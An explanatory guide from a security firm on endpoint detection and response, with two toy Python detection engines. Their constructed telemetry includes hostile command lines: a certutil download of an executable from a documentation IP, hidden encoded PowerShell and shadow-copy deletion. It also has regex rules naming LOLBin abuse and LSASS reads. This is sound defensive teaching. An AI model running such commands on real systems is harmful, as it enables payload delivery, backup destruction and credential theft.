An EDR (Endpoint Detection and Response) is the agent and console that watch in real time what is happening on every company endpoint (laptops, desktops, servers) to detect suspicious behaviour, contain the attacker and leave forensic evidence of the incident. It supersedes traditional antivirus once the attack no longer relies on known malicious files but on the abuse of legitimate tools, living-off-the-land techniques, obfuscated PowerShell scripts and lateral movement that a signature-based AV simply does not see.
This guide explains what an EDR is, how it works internally, what it detects, how it differs from antivirus, XDR and MDR, and how it fits with SIEM and SOC in a modern defensive architecture.
What an EDR is: technical definition
An EDR system is a security solution that deploys a lightweight agent on every endpoint and reports continuously to a central console with three families of information:
- Telemetry. Created processes, network connections, file access, registry changes, calls to sensitive APIs, executed PowerShell commands, loaded drivers.
- Detections. Alerts produced by behaviour engines, machine learning, YARA rules and mapping to MITRE ATT&CK techniques.
- Response actions. Network isolate the machine, kill processes, block binaries by hash, recover files, run forensic scripts.
The essential difference with traditional antivirus is one of philosophy: an AV decides whether a file is malicious by comparing its hash or signature against a database. An EDR observes the behaviour of the file (and of every process on the system) at runtime, correlates it with historical telemetry and decides whether the chain of events looks like an attack, even when the binary is fully legitimate.
How an EDR works under the hood
The operational flow of any modern EDR (CrowdStrike Falcon, Microsoft Defender for Endpoint, SentinelOne, Bitdefender GravityZone, TrendMicro Vision One, Palo Alto Cortex XDR) follows the same four blocks:
- Telemetry capture. The agent hooks into kernel callbacks, ETW (Event Tracing for Windows), eBPF on Linux and system APIs to record low-level events without the user noticing meaningful impact.
- Local plus cloud analysis. The agent runs lightweight detections on the device (heuristics, embedded ML, IoC blocklists, rules for known exploit patterns) and sends the telemetry to the vendor's cloud for cross-tenant correlation and heavier models.
- Detection and prioritisation. The vendor platform maps each event to MITRE ATT&CK techniques, groups related events into incidents and prioritises them by severity. What lands on the analyst's screen is not "event 134", it's "credential dumping attempt from a Microsoft-signed process".
- Response. The analyst (or SOAR automation) executes actions from the console: isolate the endpoint, kill processes, collect artifacts, restore files, mark IoCs for fleet-wide blocking.
What separates an EDR from an AV is this correlation layer. An AV sees cmd.exe /c whoami run and ignores it because cmd.exe is signed. An EDR sees cmd.exe /c whoami run right after a Word macro opened a connection to a never-seen IP, launched obfuscated PowerShell and added a persistence registry key, and stops it as a single attack chain.
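The correlation layer described above, as an added example that is not any vendor's code: a toy engine that tags each event with the ATT&CK technique it suggests, climbs the process tree to a common root and only raises an incident when several distinct techniques hang off the same root. The event shapes, the allowlisted destination, the session-root list and the sample telemetry (including the base64 blob) are all constructed for the example. The benign `cmd.exe /c whoami` under explorer.exe yields one weak technique and no incident; the same command at the end of the Word chain is reported as a single incident with its whole chain.

```python
"""Toy EDR correlation layer: group per-event technique hits by process ancestry."""
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional


@dataclass
class Event:
    ts: int                       # seconds since epoch (constructed)
    kind: str                     # "process" | "network" | "registry"
    pid: int
    ppid: Optional[int] = None    # process events only
    image: str = ""               # full path of the process image
    cmdline: str = ""
    dest: str = ""                # network events: remote IP
    key: str = ""                 # registry events: key path


OFFICE = {"winword.exe", "excel.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
SESSION_ROOTS = {"explorer.exe", "services.exe", "svchost.exe"}  # ancestry walk stops below these
KNOWN_DESTS = {"10.0.0.5"}        # hypothetical allowlist, e.g. the corporate proxy


def base(path):
    return path.lower().rsplit("\\", 1)[-1]


def techniques(ev, procs):
    """ATT&CK techniques suggested by one event. Each is weak on its own."""
    out = []
    if ev.kind == "process":
        img, cmd = base(ev.image), ev.cmdline.lower()
        parent = procs.get(ev.ppid)
        if parent and base(parent.image) in OFFICE and img in SHELLS:
            out.append("T1204.002 Office spawned a shell")
        if img == "powershell.exe" and ("-enc" in cmd or "frombase64string" in cmd):
            out.append("T1059.001 encoded PowerShell")   # deliberately loose check
        if "whoami" in cmd:
            out.append("T1033 user discovery")
    elif ev.kind == "network" and ev.dest not in KNOWN_DESTS:
        out.append("T1071 outbound to unknown host")
    elif ev.kind == "registry" and "\\currentversion\\run" in ev.key.lower():
        out.append("T1547.001 Run key persistence")
    return out


def root_of(pid, procs):
    """Climb the parent chain until just below a session root (or an unknown parent)."""
    while pid in procs:
        parent = procs[pid].ppid
        if parent not in procs or base(procs[parent].image) in SESSION_ROOTS:
            break
        pid = parent
    return pid


def correlate(events, min_techniques=3):
    """Emit one incident per root process whose chain shows >= min_techniques distinct techniques."""
    procs, by_root = {}, defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.kind == "process":
            procs[ev.pid] = ev        # process table is built as telemetry arrives
        for t in techniques(ev, procs):
            by_root[root_of(ev.pid, procs)].append((ev.ts, t))
    incidents = []
    for root, hits in by_root.items():
        distinct = sorted({t for _, t in hits})
        if len(distinct) >= min_techniques:
            incidents.append({
                "root_pid": root,
                "root_image": base(procs[root].image) if root in procs else "?",
                "first_seen": hits[0][0],
                "techniques": distinct,
            })
    return incidents


# Constructed telemetry: an admin's whoami, then the same command inside a macro chain.
SAMPLE = [
    Event(1000, "process", 100, 1, r"C:\Windows\explorer.exe"),
    Event(1010, "process", 200, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    Event(1100, "process", 300, 100, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
          "WINWORD.EXE /n invoice.docm"),
    Event(1102, "network", 300, dest="203.0.113.7"),                       # never-seen IP
    Event(1103, "process", 310, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    Event(1104, "registry", 310, key=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater"),
    Event(1105, "process", 320, 310, r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
]

if __name__ == "__main__":
    for inc in correlate(SAMPLE):
        print(inc)
```

A real platform keys on globally unique process identifiers rather than reusable PIDs and climbs far larger trees, but the shape is the same: weak signals become an incident only through the ancestry that links them.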
What an EDR actually detects
The EDR covers the malware families that traditional antivirus does not see (RATs, modern infostealers, fileless attacks) and focuses on five behaviour families that justify having one in a real company:
- Living off the land. Abuse of legitimate, signed system binaries (PowerShell, wmic, certutil, bitsadmin, mshta, regsvr32) to execute payloads, download files or pivot. An AV sees nothing strange because the binaries are signed; the EDR catches the anomalous usage pattern (parent process, command-line arguments, network destination).
- Credential dumping. Access to the lsass.exe process memory to extract credentials (Mimikatz and derivatives). It is one of the first techniques an attacker tries after taking an endpoint, and detection for it is in every mature EDR.
- Persistence. New services, scheduled tasks, registry Run keys, DLL hijacking, Image File Execution Options. The EDR keeps an inventory of these points and warns when suspicious changes appear.
- Lateral movement. Use of SMB, WinRM, RDP, PsExec or WMI to jump between machines. Combined with identity telemetry (Active Directory, Entra ID), the EDR reconstructs the movement graph.
- Ransomware. Mass file encryption, shadow copy deletion, backup service termination, communication with known C2. Modern EDRs stop ransomware in the first seconds of encryption and the ones with rollback recover the affected files.
On top of this comes retrospective threat hunting: the analyst runs queries over weeks or months of telemetry searching for patterns that were not in the rules when the events happened. That is what makes the EDR useful after an incident, not only during it.
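The behaviour families listed above and the retrospective hunt, as an added example rather than any product's rule set: command-line patterns for the named living-off-the-land binaries, an lsass.exe access check keyed on the PROCESS_VM_READ right with an allowlist for processes that legitimately read it, a shadow-copy-deletion rule, and a sliding-window counter that flags a process renaming many files in a few seconds. A `hunt()` function then runs a new pattern over the stored telemetry, which is what retrospective hunting amounts to. The event shapes are loosely modelled on Sysmon process, process-access and file events; the thresholds, the allowlist and all sample events are constructed.

```python
"""Behaviour rules for LOLBins, LSASS access, shadow-copy deletion and mass encryption."""
import re
from collections import defaultdict, deque

# Hypothetical rule set: (technique, regex over the full command line)
LOLBIN_RULES = [
    ("T1105 certutil download",       re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I)),
    ("T1218.005 mshta remote script", re.compile(r"\bmshta(\.exe)?\s+(https?:|javascript:|vbscript:)", re.I)),
    ("T1218.010 regsvr32 scriptlet",  re.compile(r"\bregsvr32(\.exe)?\b.*/i:https?://", re.I)),
    ("T1197 bitsadmin transfer",      re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer", re.I)),
    ("T1490 shadow copy deletion",    re.compile(r"\bvssadmin(\.exe)?\b.*delete\s+shadows|\bwmic\b.*shadowcopy\s+delete", re.I)),
]

PROCESS_VM_READ = 0x0010                 # access right needed to read another process's memory
LSASS_READERS_OK = {"msmpeng.exe", "csrss.exe", "wmiprvse.exe"}   # constructed allowlist

RANSOM_WINDOW_S = 10                     # seconds
RANSOM_THRESHOLD = 50                    # renames by one process inside the window


def _base(path):
    return path.lower().rsplit("\\", 1)[-1]


def detect(events):
    """Return [(technique, pid, detail)] for events that match a rule.

    Event shapes (constructed):
      {"t", "type": "process",        "pid", "image", "cmdline"}
      {"t", "type": "process_access", "pid", "image", "target", "mask"}
      {"t", "type": "file_rename",    "pid", "path", "new_path"}
    """
    hits = []
    rename_windows = defaultdict(deque)  # pid -> timestamps of recent renames
    ransom_fired = set()                 # fire the ransomware rule once per process
    for ev in sorted(events, key=lambda e: e["t"]):
        if ev["type"] == "process":
            for technique, rx in LOLBIN_RULES:
                if rx.search(ev["cmdline"]):
                    hits.append((technique, ev["pid"], ev["cmdline"]))
        elif ev["type"] == "process_access":
            if (_base(ev["target"]) == "lsass.exe"
                    and ev["mask"] & PROCESS_VM_READ
                    and _base(ev["image"]) not in LSASS_READERS_OK):
                hits.append(("T1003.001 LSASS memory read", ev["pid"],
                             f"{_base(ev['image'])} mask=0x{ev['mask']:x}"))
        elif ev["type"] == "file_rename":
            w = rename_windows[ev["pid"]]
            w.append(ev["t"])
            while w and w[0] < ev["t"] - RANSOM_WINDOW_S:   # drop renames outside the window
                w.popleft()
            if len(w) >= RANSOM_THRESHOLD and ev["pid"] not in ransom_fired:
                ransom_fired.add(ev["pid"])
                hits.append(("T1486 mass file rename (encryption)", ev["pid"],
                             f"{len(w)} renames in {RANSOM_WINDOW_S}s"))
    return hits


def hunt(events, pattern):
    """Retrospective hunt: apply a pattern written today to telemetry captured earlier."""
    rx = re.compile(pattern, re.I)
    return [ev for ev in events if ev["type"] == "process" and rx.search(ev["cmdline"])]


# Constructed telemetry. 203.0.113.7 is a documentation address.
SAMPLE = [
    {"t": 100, "type": "process", "pid": 500, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.7/a.txt C:\\Users\\Public\\a.exe"},
    {"t": 101, "type": "process", "pid": 501, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -hashfile C:\\setup.msi SHA256"},          # legitimate use, no hit
    {"t": 120, "type": "process_access", "pid": 600, "image": r"C:\Users\Public\rundll32.exe",
     "target": r"C:\Windows\System32\lsass.exe", "mask": 0x1010},
    {"t": 121, "type": "process_access", "pid": 4, "image": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "target": r"C:\Windows\System32\lsass.exe", "mask": 0x1FFFFF},      # AV engine, allowlisted
    {"t": 200, "type": "process", "pid": 700, "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
]
# 60 renames to .locked within 6 seconds from one process; 3 slow renames from another
SAMPLE += [{"t": 201 + i // 10, "type": "file_rename", "pid": 700,
            "path": f"C:\\Data\\doc{i}.docx", "new_path": f"C:\\Data\\doc{i}.docx.locked"} for i in range(60)]
SAMPLE += [{"t": 300 + i, "type": "file_rename", "pid": 800,
            "path": f"C:\\Tmp\\f{i}", "new_path": f"C:\\Tmp\\f{i}.bak"} for i in range(3)]

if __name__ == "__main__":
    for hit in detect(SAMPLE):
        print(hit)
    print("hunt:", [ev["pid"] for ev in hunt(SAMPLE, r"-urlcache")])
```

Two points worth carrying over to a real deployment: the lsass rule is only as good as its allowlist (every entry is a blind spot of the kind discussed under common mistakes below), and the rename counter needs a window and a per-process one-shot, or a backup job will page the SOC every night.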
EDR compared to traditional antivirus
Three differences that change everything:
- Detection. AV finds malicious files by signature or hash; EDR finds behaviour chains, even when the binaries are legitimate.
- Telemetry. AV generates alerts; EDR generates continuous telemetry that lets you reconstruct any later event. Without EDR, after an incident you only have whatever logs the victim happened to keep.
- Response. AV quarantines the file; EDR isolates the machine, kills processes, collects forensic artifacts and blocks IoCs across the whole fleet.
Modern AV (NGAV or next-gen antivirus) has incorporated behaviour capabilities, but EDR remains the category that adds continuous telemetry and orchestrated response. In practice major vendors integrate AV plus EDR into the same agent: you install one product that covers both layers.
EDR vs XDR vs MDR: clearing the acronym soup
Three acronyms that get mixed up routinely:
- EDR (Endpoint Detection and Response). The detection and response layer over endpoints. Deep telemetry on PCs and servers.
- XDR (Extended Detection and Response). The extension of EDR to other telemetry sources: network, identity, email, cloud. Integrates data from several products of the same vendor (or third parties) into a single view. Microsoft Defender XDR is the clearest example: it combines Defender for Endpoint, for Identity, for Office 365 and for Cloud Apps in one console.
- MDR (Managed Detection and Response). The managed service wrapped around an EDR (or XDR). A provider runs the platform 24/7 with their own analysts, delivers triaged alerts and, in many cases, executes initial containment. It is what companies without an internal SOC contract.
Quick rule: EDR is the product, XDR is the extended platform, MDR is the service.
EDR platforms most common in the Spanish market
The platforms that appear in any serious evaluation:
- CrowdStrike Falcon. Widely seen as the technical leader. Very mature detections, rich telemetry, threat graph in the cloud. Expensive licensing model but the benchmark.
- Microsoft Defender for Endpoint. Attractive when the company is already on Microsoft 365 E5 (included) or E3 plus add-on. Native integration with Entra ID, Defender XDR and Sentinel.
- SentinelOne Singularity. Best known for ransomware rollback. Lower operational footprint for mid-sized companies.
- Bitdefender GravityZone. Strong in mid-market and European partners. Mature MDR model.
- TrendMicro Vision One. Wide coverage, strong in Latin America and Spain, powerful XDR integration.
- Cortex XDR (Palo Alto). Attractive when the company already has a Palo Alto firewall. Good network analysis.
- Sophos Intercept X. Mid-market and MSP, competitive price-to-coverage ratio.
- ESET Inspect, Cybereason, Elastic Endpoint Security. Other options that appear in tenders depending on context.
Don't choose by brand. Choose by integration with your current stack, internal operating capability and licensing model against your real endpoint volume.
EDR, SIEM and SOC: how they fit together
A common mistake is to treat the EDR as a replacement for the SIEM or the SOC. It is not. Each piece has its role:
- The EDR is the deep telemetry and response layer over endpoints. It is the finest eye on what happens inside every machine.
- The SIEM is the broad correlation layer that ties EDR, firewall, identity, cloud, applications and more. It gives a cross-domain view when the attack crosses boundaries.
- The SOC is the team that operates both: it triages EDR alerts, runs queries on the SIEM, decides when to escalate and executes the response.
The architecture that works in a modern company combines all three: EDR as deep detector, SIEM as correlator, SOC as the human brain. Skipping the SIEM can work in a small company; skipping the SOC never works. EDR alerts with nobody to attend to them are expensive noise.
Common mistakes when deploying an EDR
Three usual ways to burn the budget:
- Install the agent and stop there. No tailored detection rules, no tuning, no response. The EDR turns into another console nobody looks at.
- Exclude too much for fear of false positives. Every exclusion is a blind spot. Sensible exclusions get documented, justified and reviewed; the ones done "just because" become exactly where the attacker hides persistence.
- No connection between EDR, SIEM and SOC. The rich telemetry captured by the EDR loses most of its value without cross-correlation with identity, network and cloud. With nobody operating the alerts, the EDR is a post-mortem forensic log, not a detection system.
EDR and compliance
The EDR appears as technical evidence in several frameworks that apply to Spanish companies:
- NIS2 (article 21.2.b, incident handling). Risk management measures require detection and response capabilities proportional to the risk. EDR plus SOC is the canonical implementation.
- ENS (Spanish Royal Decree 311/2022). Measures op.mon.1 (intrusion detection), op.exp.6 (protection against malicious code) and op.exp.8 (activity logging) presume operational endpoint telemetry.
- ISO 27001:2022 (controls A.8.7 Protection against malware and A.8.16 Monitoring activities). Require detection mechanisms on endpoints with systematic review.
- PCI DSS v4.0. Maintenance of up-to-date anti-malware capabilities (req. 5), logging and monitoring of security events (req. 10) and intrusion detection (req. 11.5) on systems that process card data.
Frequently asked questions about EDR
What is the difference between EDR and antivirus?
Traditional antivirus finds malicious files by signature; EDR detects chains of suspicious behaviour, captures continuous telemetry and allows orchestrated response (isolate, kill processes, collect artifacts). In practice modern EDRs include antivirus functionality inside the same agent.
Does EDR replace the firewall, SIEM or backup?
No. EDR covers detection and response on endpoints. The firewall protects the network, the SIEM correlates events from the whole organisation, the backup makes recovery from an incident possible. They are complementary pieces in a defensive architecture.
How much does an EDR cost?
Pricing is per endpoint per month and varies a lot by vendor, volume and add-ons (XDR, MDR, threat intel, managed threat hunting). Reasonable options for mid-market sit in the low single-digit euros per endpoint per month range; top-tier options multiply that figure. The sensible call is to run a POC on your own environment before committing, not to rely on generic comparison tables. For broader pricing logic see penetration testing pricing in Spain.
Do I need a SOC to run an EDR?
Yes, in some form. An EDR without anyone attending to the alerts becomes a console nobody looks at. If there is no internal SOC, the usual move is to contract MDR (managed service over the EDR) or a managed cybersecurity provider that operates the platform 24/7.
Does the EDR detect ransomware?
Yes. Modern EDRs detect and block the typical ransomware patterns (mass encryption, shadow copy deletion, communication with C2). The ones with rollback (SentinelOne, some CrowdStrike configurations) recover files encrypted in the seconds before the block triggered. Combined with offline backup and a watching SOC, it significantly reduces incident impact.
Does EDR work on macOS and Linux?
Enterprise EDRs (CrowdStrike, SentinelOne, Defender, Bitdefender, TrendMicro) cover Windows, macOS and the main Linux distributions. Technical coverage varies: Windows has the richest telemetry; Linux and macOS usually have fewer predefined detections but capture critical events (processes, network, file integrity, Linux audit log). In environments where most servers are Linux, validate the specific EDR coverage before committing.
How do you measure whether an EDR is being useful?
Three operational metrics: MTTD (mean time to detect from the first suspicious event), MTTR (mean time to respond until containment), and MITRE ATT&CK coverage (what percentage of techniques relevant to your sector are covered by active rules). An EDR without these metrics in place is an EDR nobody is really operating.
Related resources
- What is a SOC (Security Operations Center): the team and processes that operate the EDR.
- What is SIEM and how it works: the correlation platform that connects EDR with identity, network and cloud.
- What is a CVE: vulnerabilities explained: how CVE feeds drive EDR detection of known exploits.
- What is a penetration test: how pentesting validates real EDR coverage.
EDR at Secra
At Secra we run the EDR inside our managed cybersecurity service, with the platform operated by our team, rules adapted to the client's sector and continuous detection engineering so coverage grows with the organisation. If you want a concrete proposal for your endpoint volume and current stack, get in touch through contact.
About the author
Secra Solutions team
Ethical hackers with OSCP, OSEP, OSWE, CRTO, CRTL and CARTE certifications, 7+ years of experience in offensive cybersecurity, and authors of CVE-2025-40652 and CVE-2023-3512.